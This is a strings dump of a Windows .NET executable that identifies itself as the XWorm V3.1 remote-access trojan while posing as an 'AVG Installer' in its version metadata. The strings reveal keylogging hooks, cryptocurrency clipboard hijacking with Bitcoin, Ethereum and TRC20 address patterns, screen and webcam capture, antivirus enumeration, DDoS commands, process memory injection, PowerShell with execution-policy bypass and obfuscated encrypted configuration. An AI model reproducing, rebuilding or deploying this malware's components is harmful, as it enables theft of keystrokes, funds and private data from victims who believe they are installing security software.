!This program cannot be run in DOS mode.
`.rsrc
@.reloc
Z ?_d
_b`*
v4.0.30319
#Strings
AssemblyTrademarkAttribute
System.Reflection
mscorlib
System
String
AssemblyFileVersionAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
GuidAttribute
System.Runtime.InteropServices
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTitleAttribute
CompilationRelaxationsAttribute
System.Runtime.CompilerServices
Boolean
RuntimeCompatibilityAttribute
TargetFrameworkAttribute
System.Runtime.Versioning
AssemblyConfigurationAttribute
AssemblyDelaySignAttribute
AssemblyKeyFileAttribute
AssemblyKeyNameAttribute
sssss.exe
<Module>
ApplicationBase
Microsoft.VisualBasic.ApplicationServices
Microsoft.VisualBasic
Computer
Microsoft.VisualBasic.Devices
Object
_Closure$__1
MulticastDelegate
_Closure$__2
_Closure$__3
System.Windows.Forms
ValueType
VB$AnonymousDelegate_0
<Module>{9AAEEFF3-E2BE-4BFE-9ABD-C7B7FC82F7C0}
ILLicenseModule
Attribute
<PrivateImplementationDetails>{3867D8E3-FAC5-46B4-A900-377BEB902C1F}
__StaticArrayInitTypeSize=256
__StaticArrayInitTypeSize=32
__StaticArrayInitTypeSize=16
__StaticArrayInitTypeSize=18
.cctor
get_Computer
get_GetInstance
get_Application
get_User
get_WebServices
Application
WebServices
Equals
RuntimeHelpers
GetObjectValue
GetHashCode
GetType
GetTypeFromHandle
RuntimeTypeHandle
ToString
Create__Instance__
instance
Activator
CreateInstance
Dispose__Instance__
GetInstance
Interaction
Environ
Concat
Thread
System.Threading
Exception
ThreadStart
IntPtr
Conversions
Microsoft.VisualBasic.CompilerServices
ProjectData
SetProjectError
Environment
ClearProjectError
_Lambda$__1
_Lambda$__2
_Lambda$__3
_Lambda$__4
Random
WaitHandle
WaitOne
Socket
System.Net.Sockets
MemoryStream
System.IO
ManualResetEvent
BeginConnect
TimerCallback
AddressFamily
SocketType
ProtocolType
set_ReceiveBufferSize
set_SendBufferSize
ToInteger
Connect
AsyncCallback
BeginReceive
IAsyncResult
SocketFlags
EventWaitHandle
ComputerInfo
get_UserName
get_OSFullName
Replace
get_OSVersion
OperatingSystem
get_ServicePack
get_Is64BitOperatingSystem
INDATE
FileInfo
DateTime
FileSystemInfo
get_LastWriteTime
Spread
GetFileName
Operators
CompareString
WindowsIdentity
System.Security.Principal
GetCurrent
WindowsPrincipal
IsInRole
WindowsBuiltInRole
Antivirus
ManagementObjectSearcher
System.Management
StringBuilder
System.Text
ManagementBaseObject
ManagementObjectEnumerator
ManagementObjectCollection
get_MachineName
GetEnumerator
Append
get_Current
get_Item
MoveNext
IDisposable
Dispose
get_Length
Substring
EndReceive
ToArray
ToLong
Stream
WriteByte
WaitCallback
ThreadPool
QueueUserWorkItem
BeginRead
ObjectFlowControl
CheckForSyncLockOnValueType
Monitor
SelectMode
BeginSend
EndSend
isDisconnected
Collect
_Lambda$__5
_Lambda$__6
WebClient
System.Net
Graphics
System.Drawing
Rectangle
Bitmap
Strings
CompareMethod
Restart
Shutdown
SocketShutdown
GetTempPath
Combine
DownloadFile
Process
System.Diagnostics
AppWinStyle
ParameterizedThreadStart
AddObject
ConcatenateObject
ReadAllText
Screen
get_PrimaryScreen
get_Bounds
get_Width
get_Height
PixelFormat
System.Drawing.Imaging
FromImage
CopyFromScreen
CopyPixelOperation
DrawImage
GraphicsUnit
ImageFormat
get_Jpeg
MessageBox
DialogResult
get_Message
Plugin
MethodInfo
AppDomain
get_CurrentDomain
Assembly
GetTypes
GetMethods
NewLateBinding
LateGet
ConditionalCompareObjectEqual
Exists
LateCall
Convert
ToInt32
ToBoolean
MemberInfo
get_Name
StartsWith
SendMSG
SendError
Stopwatch
TimeSpan
get_Elapsed
op_GreaterThan
FromSeconds
Double
Monitoring
List`1
System.Collections.Generic
GetProcesses
get_MainWindowTitle
IsNullOrEmpty
ToLower
Contains
Func`2
Enumerable
System.Linq
System.Core
IEnumerable`1
OpenUrl
Hidden
HttpWebRequest
HttpWebResponse
ServicePointManager
set_Expect100Continue
set_SecurityProtocol
SecurityProtocolType
set_DefaultConnectionLimit
WebRequest
Create
set_UserAgent
set_AllowAutoRedirect
set_Timeout
set_Method
GetResponse
WebResponse
capCreateCaptureWindowA
lpszWindowName
dwStyle
nWidth
nHeight
hwndParent
avicap32.dll
capGetDriverDescriptionA
wDriver
lpszName
cbName
lpszVer
RunDisk
Extension
ProcessStartInfo
WriteAllBytes
EndsWith
set_WindowStyle
ProcessWindowStyle
set_Arguments
Memory
buffer
get_EntryPoint
MethodBase
GetParameters
ParameterInfo
Invoke
_Lambda$__7
_Lambda$__8
$VB$Local_Host
$VB$Local_Port
_Lambda$__9
Encoding
get_UTF8
GetBytes
IsUpdate
StreamWriter
GetTempFileName
TextWriter
WriteLine
get_StartupPath
get_ExecutablePath
set_FileName
set_CreateNoWindow
set_ErrorDialog
set_UseShellExecute
SetHook
GetCurrentProcess
get_ProcessName
HookCallback
wParam
lParam
get_NewLine
ToUInteger
UInt32
op_Explicit
op_Equality
Marshal
ReadInt32
KeyboardLayout
vkCode
GetActiveWindowTitle
GetProcessById
IsNullOrWhiteSpace
SetWindowsHookEx
idHook
dwThreadId
user32.dll
UnhookWindowsHookEx
CallNextHookEx
GetModuleHandle
lpModuleName
kernel32.dll
GetForegroundWindow
GetWindowThreadProcessId
lpdwProcessId
GetKeyState
keyCode
GetKeyboardState
lpKeyState
GetKeyboardLayout
idThread
ToUnicodeEx
wVirtKey
wScanCode
pwszBuff
cchBuff
wFlags
MapVirtualKey
uMapType
TargetObject
TargetMethod
BeginInvoke
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
System.Text.RegularExpressions
AddClipboardFormatListener
SetParent
hWndChild
hWndNewParent
GetText
SetApartmentState
ApartmentState
SetText
$VB$Local_ReturnValue
_Lambda$__10
Clipboard
$VB$Local_txt
_Lambda$__11
Control
get_Handle
RegexResult
pattern
get_Success
WndProc
Message
get_Msg
get_CreateParams
CreateParams
OrObject
LateSet
Decrypt
RijndaelManaged
System.Security.Cryptography
ICryptoTransform
MD5CryptoServiceProvider
SymmetricAlgorithm
set_Mode
CipherMode
CreateDecryptor
FromBase64String
TransformFinalBlock
HashAlgorithm
ComputeHash
set_Key
UTF8SB
UTF8BS
GetString
get_MainModule
ProcessModule
get_FileName
GetRandomString
length
get_Chars
GetLastInputInfo
GetLastInputTime
get_TickCount
SizeOf
LastAct
GetWindowText
SetThreadExecutionState
esFlags
PreventSleep
get_Default
get_ProcessorCount
get_SystemDirectory
GetPathRoot
DriveInfo
get_TotalSize
GetHashT
strToHash
get_ASCII
ToUpper
SetValue
RegistryKey
Microsoft.Win32
Registry
CurrentUser
CreateSubKey
RegistryKeyPermissionCheck
RegistryValueKind
GetValue
Decompress
ChangeType
BitConverter
GZipStream
System.IO.Compression
CompressionMode
SubtractObject
Compress
AES_Encryptor
CreateEncryptor
AES_Decryptor
CreateMutex
CloseMutex
value__
InitializeArray
RuntimeFieldHandle
leHifFIJCLsZtKEFfM1i
lA8byixHs
UInt64
npynP5ID7
UInt16
frGPLkUmg
B9QMQESRS
gW8I6urYX
efQiYYe9B
tOK6QO3G3
CATjlB2Pr
get_Assembly
GetMethod
BindingFlags
Fu0hXoi7j
AesCryptoServiceProvider
LsLeWNAEm
w2UAjPN2t
bXvlVOsQS
get_Unicode
RENgxJgNd
VirtualProtect
bcLJCVPb6
BinaryReader
get_BaseStream
get_Position
ToInt64
WriteInt32
GetManifestResourceStream
get_Size
get_Id
set_Position
Reverse
GetModules
Module
GetHINSTANCE
GetName
AssemblyName
GetPublicKeyToken
ReadBytes
aBHX1nnyl
get_Location
get_CodeBase
GetProperty
PropertyInfo
kMiVtdYDP
WriteProcessMemory
bidqXN0uo
ReadProcessMemory
SfCBK85Ng
OpenProcess
eLtxCBuln
CloseHandle
VImrySTt0
FileStream
FileMode
FileAccess
FileShare
uAjmKLvd2
CryptoStream
set_IV
CryptoStreamMode
BjndDjDik
I22aEXt06
ht400wywm
S2DfD7ndw
sX0QQqvSd
f8vGGAr2L
yEl2DlTrk
ReZSeFrDE
a1wUeQYNk
OZEYuqcRi
FjO71BLE1
Xjmyl8i2L
R7ZKDdJj0
ToBase64String
SLV0fFIsptsZtjvFft17
lE0n2FGDnMFJ4SGV2D
get_ApplyToMembers
set_ApplyToMembers
get_Exclude
set_Exclude
get_Feature
set_Feature
get_StripAfterObfuscation
set_StripAfterObfuscation
ApplyToMembers
Exclude
Feature
StripAfterObfuscation
$$method0x6000002-1
$$method0x600001c-1
$$method0x600001c-2
$$method0x600002a-1
$$method0x60000a2-1
Dictionary`2
$$method0x6000208-1
sssss.g.resources
03d472d7-25c0-4718-81de-c205aa01baf1
GeneratedCodeAttribute
System.CodeDom.Compiler
EditorBrowsableAttribute
System.ComponentModel
EditorBrowsableState
DebuggerHiddenAttribute
HideModuleNameAttribute
StandardModuleAttribute
HelpKeywordAttribute
System.ComponentModel.Design
MyGroupCollectionAttribute
ComVisibleAttribute
CompilerGeneratedAttribute
ThreadStaticAttribute
STAThreadAttribute
DebuggerStepThroughAttribute
DebuggerDisplayAttribute
FlagsAttribute
AttributeUsageAttribute
AttributeTargets
2.1.92.0
AVG Technologies CZ, s.r.o.
$d4a785c4-ac5b-43ac-ac6f-547e9cc90a37
.Copyright (C) 2023 AVG Technologies CZ, s.r.o.
AVG Installer
WrapNonExceptionThrows
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
MyTemplate
14.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
<generated method>
<generated method>
`1[[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]][]
AllowMultiple
Inherited
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
$(D%]pW
vDar>y
Asn:e1
9K#p)-
f"(e!Jx}
IR&iTK
/^e;Z'X]
Y5H{0j%
DBRfhn M
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
.;w.3nC
$#%#&#'#
\Log.tmp
BtOMMOKwdDwAnFk2CkqVWpu1RLhiDbD/EUsevZCecz3yRgz2v7anXH+v7eieanMl
Na4A/A3nCdwYodlgb8PTGa+ok7z3j/UTXHFUxTBoF4a5A4Ur/yXtuCK7Aw/wLQHS
RMhLK/OPOD2BhWsFShGpxgaPKugrwlNYRssVhz6dITwdKVcHlaQhQuXuzehgPA+R
prm15cJXncKmjac47aHAmA==
A2vXrjTo3SRo0CuOifuHJw==
qnHEPIgMHs/dPMCMgzBbKj+Q1iV2TYINOOe1LpIrICc=
Otu6jLKlPOiVYjEK+SKmkQ==
GxATa6g51MsEXZHXcfH+uA==
tijUovXsHb2Gfdky
Microsoft
Service Pack
XWorm V3.1
dd/MM/yyy
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
uninstall
update
Urlopen
Urlhide
PCShutdown
shutdown.exe /f /s /t 0
PCRestart
shutdown.exe /f /r /t 0
PCLogoff
shutdown.exe -L
StartDDos
StopDDos
StartReport
StopReport
plugin
sendPlugin
savePlugin
OfflineGet
MessageBox
Invoke
injRun
UACFunc
ngrok+
Plugin
RunRecovery
Recovery
RunOptions
Plugin Error!
Open [
ToLower
powershell.exe
-ExecutionPolicy Bypass -File "
POST / HTTP/1.1
Host:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent:
Content-length: 5235
@echo off
timeout 3 > NUL
" /f /q
[SPACE]
Return
[ENTER]
Escape
LControlKey
[CTRL]
RControlKey
RShiftKey
[Shift]
LShiftKey
[Back]
Capital
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
ToUpper
MainWindowTitle
ProcessName
\b(bc1|[13])[a-zA-HJ-NP-Z0-9]{26,45}\b
T[A-Za-z1-9]{33}
\b(0x)[a-zA-HJ-NP-Z0-9]{40,45}\b
TRC20 Clipper
BTC Clipper
ETH Clipper
ExStyle
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Software\
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
abcdefghijklmnopqrstuvwxyz
Err HWID
ToArray
System.Security.Cryptography.CryptoConfig
get_AllowOnlyFipsAlgorithms
{11111-22222-10009-11111}
{11111-22222-50001-00000}
03d472d7-25c0-4718-81de-c205aa01baf1
file:///
Location
{11111-22222-10001-00001}
{11111-22222-10001-00002}
{11111-22222-20001-00001}
{11111-22222-20001-00002}
{11111-22222-40001-00001}
{11111-22222-40001-00002}
{11111-22222-50001-00001}
{11111-22222-50001-00002}
{11111-22222-60001-00001}
{11111-22222-60001-00002}
This assembly is protected by an unregistered version of "IntelliLock"!
www.eziriz.com
<script language='javascript'>alert( "This assembly is protected by an unregistered version of IntelliLock!" );</script>
abcdefghijklmnopqrstuvwxyz
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
CompanyName
AVG Technologies CZ, s.r.o.
FileDescription
AVG Installer
FileVersion
2.1.92.0
InternalName
sssss.exe
LegalCopyright
Copyright (C) 2023 AVG Technologies CZ, s.r.o.
OriginalFilename
sssss.exe
ProductName
ProductVersion
2.1.92.0
Assembly Version
2.1.92.0